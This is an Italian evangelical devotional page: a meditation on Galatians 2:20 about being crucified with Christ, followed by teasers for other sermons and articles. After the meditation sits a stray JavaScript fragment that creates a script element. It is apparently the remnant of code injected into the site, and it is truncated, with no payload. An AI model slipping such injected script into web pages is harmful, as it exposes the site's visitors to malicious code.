Meditazione del giorno: Crocifisso con Cristo

“Io sono stato crocifisso con Cristo” (Galati 2:20).

Il Signore Gesù Cristo compì l’opera Sua come nostro pubblico rappresentante, e la Sua morte sulla croce fu virtualmente la morte di tutto il Suo popolo. Allora tutti i Suoi santi hanno reso alla giustizia ciò che le era dovuto, avendo fatto espiazione verso la vendetta divina per tutti i loro peccati. Paolo, l’apostolo dei Gentili, si rallegrò nel pensare che come parte del popolo eletto di Cristo, anche lui era morto sulla croce in Cristo. Egli non si limitò a crederlo dottrinalmente, ma lo accettò con fiducia, riponendo la sua speranza in questo. Paolo credette che per la virtù della morte di Cristo, aveva soddisfatto la giustizia divina, e trovato riconciliazione con Dio.

Amati, che benedizione è quando l’anima può guardare alla croce di Cristo, e sentire: “sono morto; la legge mi ha ucciso, e perciò io sono libero dal suo potere, perché nella mia Certezza ho portato la maledizione, e nella persona del mio Sostituto tutto quello che la legge poteva fare, mediante la condanna, mi è stato inflitto, poiché io sono crocifisso con Cristo”.

Ma Paolo intendeva anche più di questo. Egli non credette soltanto nella morte di Cristo, riponendo fede in essa, ma sentì realmente la sua potenza che operava in lui per crocifiggere la sua vecchia natura corrotta. Quando egli vedeva i piaceri del peccato, diceva: “Non posso goderne: io sono morto ad essi”.
Tale è l’esperienza di ogni vero Cristiano. Avendo ricevuto Cristo, il credente è come definitavemente morto a questo mondo. Ma pur essendo cosciente di essere morto al mondo, egli può al tempo stesso esclamare con l’apostolo: “Ma io vivo”. Egli è realmente vivente davanti a Dio. La vita Cristiana è un enigma senza pari. Nessun uomo carnale può comprenderlo; neanche il credente stesso può farlo. Morto, eppure vivo! Crocifisso con Cristo, eppure allo stesso tempo risorto con Cristo in novità di vita! Essere unito al Salvatore sofferente e sanguinante, ed essere morto al mondo e al peccato, sono cose che rallegrano l’anima. Oh che noi possiamo vivere maggiormente in esse!
var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

Signore! Signore!

di Roberto Bracco   –   Questo grido si eleva insistentemente quasi a dimostrare che anche in questi giorni di generale indifferenza esiste un popolo che guarda verso Dio, che parla con Dio, che osserva la legge di Dio. Dalle chiese o dagli individui, dai paesi o dalle città s’innalza e si ripete: Signore, Signore! Non è vero, come affermano alcuni, che non c’è più religione; non è vero che Dio …
Leggi Tutto

DIO PUO' FARLO ANCORA

di  Jonathan Goforth   –  La stessa potenza che discese sui discepoli durante la Pentecoste, può discendere oggi nella tua chiesa.  Una volta un missionario mi disse che egli avrebbe desiderato dar vita ad un risveglio, ma che non gli era possibile ottenere l’aiuto di un evangelista perché la sua missione era molto fuori mano. Come se lo Spirito di Dio operi soltanto per pochi selezionati! Queste false idee …
Leggi Tutto

mp3

Amen, Vieni Signor Gesù [mp3player width=500 height=20 config=fmp_jw_widget_config.xml file=http://www.chiesadiroma.it/wp-content/uploads/2014/10/AMEN-VIENI-SIGNOR-GESU.mp3]  …
Leggi Tutto

STORIA DI UN INNO: ABIDE WITH ME

Henry F. Lyte  ABIDE WITH ME (JESSY DIXON) Henry Francis Lyte  (1793-1847) nacque a Ednam, in Scozia e studiò alla Royal School di Enniskillen e al Trinity College, Dublino, dove conseguì la laurea in teologia.  Nel 1818 accadde qualcosa che nella sua vita ebbe un grande impatto spirituale, e che determinò un radicale cambiamento:  la malattia e la morte di un suo grande amico e fratello, un caro …
Leggi Tutto

Heavy Metal satanista, redento da Cristo.

Se c’era un uomo che apparentemente sembrava irrecuperabile, Kirk Martin è la personificazione di quell’uomo. Pieno di violenza e di odio – dopo aver fatto un patto con il diavolo – solo Dio poteva trovare il modo e la strategia per tirarlo fuori  da quell’ abisso infernale.  “Ho sempre pensato che Dio poteva amare alcune persone, ma non me!” dice Martin. Era il quarto figlio adottivo di una cara …
Leggi Tutto

Dio vuole salvare il peccatore

di JACK HAYFORD  –  L’onestà verso Dio è una premessa indispen­sabile per una preghiera efficace. Se non ri­spettiamo questa premessa corriamo il rischio di finire nella trappola che Satana, il nostro nemico mortale, è sempre pronto a tenderci. Finiremo quindi per cadere in un circolo vi­zioso che renderà la nostra vita spirituale as­solutamente inefficiente. Se ci troviamo in questa situazione, ci chiederemo inevitabil­mente: »Come posso permettermi di pregare, …
Leggi Tutto

LA RISCOPERTA DELLO SPIRITO

di JIM CYMBALA  –  Non mi aspettavo che lo Spirito Santo si unisse a me per pranzo, eppure è esattamente ciò che accadde.  Mia moglie Carol era fuori città, così andai in un piccolo bar che mi piace a Long Island. Trovai un tavolo tranquillo contro il muro, ordinai la mia solita insalata e mentre gustavo il mio salutare pranzo iniziai a leggere. Sono abbonato al New York …
Leggi Tutto

Charles Spurgeon: Predicare tra le avversità

di John Piper  –  Charles Haddon Spurgeon morì il 31 gennaio del 1892, all’età di 57 anni. Predicò per 38 anni al “Metropolitan Tabernacle” di Londra. La sua vita è ricchissima d’insegnamenti per i cristiani e specialmente per i pastori. Tutti dobbiamo affrontare le avversità e trovare in mezzo ad esse, il modo di perseverare anche nei momenti più opprimenti della vita. Tutti, allo stesso modo, devono alzarsi, fare …
Leggi Tutto

Dai nostri Culti